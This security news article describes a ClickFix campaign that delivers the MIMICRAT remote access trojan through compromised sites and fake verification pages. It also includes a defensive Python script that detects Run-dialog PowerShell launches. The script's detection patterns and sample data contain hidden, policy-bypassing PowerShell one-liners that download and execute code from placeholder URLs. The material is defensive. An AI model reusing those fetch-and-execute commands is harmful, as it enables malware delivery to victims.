Cybersecurity researchers have detailed a new ClickFix campaign that abuses compromised legitimate websites to distribute a previously undocumented remote access trojan (RAT) called MIMICRAT (also tracked as AstarionRAT).
According to Elastic Security Labs, the campaign shows a high level of operational sophistication: compromised sites from a range of industries and regions serve as delivery infrastructure, a multi-stage PowerShell chain disables ETW and AMSI, and a Lua-scripted shellcode loader then stages the final implant, which communicates over HTTPS on port 443 while mimicking legitimate web analytics traffic.
MIMICRAT is identified as a custom C++ RAT with features such as Windows token impersonation, SOCKS5 tunneling, and a comprehensive set of 22 commands for post-exploitation activities. The campaign was unearthed earlier this month.
There are similarities between this campaign and another ClickFix campaign identified by Huntress, which leads to the deployment of the Matanbuchus 3.0 loader, serving as a conduit for the same RAT. The ultimate goal of the attack seems to be either ransomware deployment or data exfiltration.
The infection chain, outlined by Elastic, begins with bincheck[.]io, a legitimate BIN validation service that was compromised to inject malicious JavaScript code. This code loads an externally hosted PHP script, which then delivers the ClickFix lure through a fake Cloudflare verification page, prompting the victim to run a command in the Windows Run dialog.
This action triggers a PowerShell command, connecting to a command-and-control server to retrieve a second-stage PowerShell script that patches ETW and AMSI, before dropping a Lua-based loader. In the final phase, the Lua script decrypts and executes shellcode in memory to deliver MIMICRAT.
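The chain above leaves a distinctive host artifact: explorer.exe (which hosts the Run dialog) spawning PowerShell with a remote download cradle, and the pasted command itself persisting in the user's Run-dialog history under the RunMRU registry key. The following is an added example, not code from Elastic's or Huntress's write-ups, showing how a responder might score process-creation events and RunMRU entries for that pattern. The event records, the RunMRU contents, the example.invalid URLs, and the indicator weights and alert threshold are all constructed assumptions for the example; the field names follow Sysmon Event ID 1 but any EDR export can be mapped onto them.

```python
"""Triage helpers for ClickFix-style execution (added example; all data constructed)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal view of a process-creation event (Sysmon Event ID 1 field names)."""
    parent_image: str
    image: str
    command_line: str


# Weighted command-line indicators. Weights and ALERT_THRESHOLD are assumptions
# chosen for this example, not values from the reports.
INDICATORS = [
    ("download cradle",
     re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
                r"downloadfile|net\.webclient|start-bitstransfer)\b", re.I), 2),
    ("in-memory execution (iex)", re.compile(r"\b(iex|invoke-expression)\b", re.I), 2),
    ("hidden window", re.compile(r"-(w|win|windowstyle)\s+hidden", re.I), 1),
    ("execution policy bypass", re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), 1),
    ("encoded command", re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("remote URL", re.compile(r"https?://", re.I), 1),
]
ALERT_THRESHOLD = 5
POWERSHELL_RE = re.compile(r"(^|[\\/])(powershell|pwsh)(\.exe)?$", re.I)


def score_event(ev):
    """Return (score, reasons) for one process-creation event; non-PowerShell images score 0."""
    score, reasons = 0, []
    if not POWERSHELL_RE.search(ev.image):
        return 0, reasons
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    if parent == "explorer.exe":
        # Run-dialog (Win+R) commands are launched by explorer.exe. Shortcuts and
        # double-clicked scripts produce the same parent, so this is weighted,
        # not treated as a hard rule on its own.
        score += 3
        reasons.append("spawned by explorer.exe (Run dialog / shell)")
    for name, rx, weight in INDICATORS:
        if rx.search(ev.command_line):
            score += weight
            reasons.append(name)
    return score, reasons


def is_clickfix_like(ev):
    return score_event(ev)[0] >= ALERT_THRESHOLD


def parse_runmru(values):
    """Reconstruct Run-dialog history from HKCU\\...\\Explorer\\RunMRU.

    Explorer stores each entry under a single-letter value name with a trailing
    "\\1" marker and keeps recency order (most recent first) in "MRUList".
    `values` is the key's name->data mapping, e.g. read with winreg or reg.exe.
    """
    commands = []
    for letter in values.get("MRUList", ""):
        data = values.get(letter)
        if data is None:
            continue
        commands.append(data[:-2] if data.endswith("\\1") else data)
    return commands


def runmru_hits(values):
    """Return RunMRU commands that score like a ClickFix paste."""
    hits = []
    for cmd in parse_runmru(values):
        image = cmd.split(None, 1)[0] if cmd.strip() else ""
        ev = ProcEvent("C:\\Windows\\explorer.exe", image, cmd)
        if is_clickfix_like(ev):
            hits.append(cmd)
    return hits


# Constructed sample data: one ClickFix-style launch, one benign scheduled
# script, one bare interactive PowerShell started from the shell.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -ep bypass -c "iex (iwr -UseBasicParsing https://example.invalid/check).Content"'),
    ProcEvent(r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),
]
SAMPLE_RUNMRU = {
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -ep bypass -c "irm https://example.invalid/verify | iex"\\1',
}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(score_event(ev), ev.command_line[:60])
    print("RunMRU hits:", runmru_hits(SAMPLE_RUNMRU))
```

The scoring is deliberately additive rather than a single signature: the second-stage script and loader names will change between campaigns, but the combination of an explorer.exe parent, a download cradle and in-memory execution is the part of the ClickFix technique the victim has to perform by hand, and the RunMRU entry survives even when the PowerShell process and its logs do not.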
The Trojan employs HTTPS for communication with the C2 server, enabling it to accept commands for process and file system control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling.
Security researcher Salim Bitam noted that the campaign supports 17 languages, with the lure content dynamically localized based on the victim’s browser language settings. Victims have been observed across various regions, including a university in the USA and multiple Chinese-speaking users in public forums, indicating broad opportunistic targeting.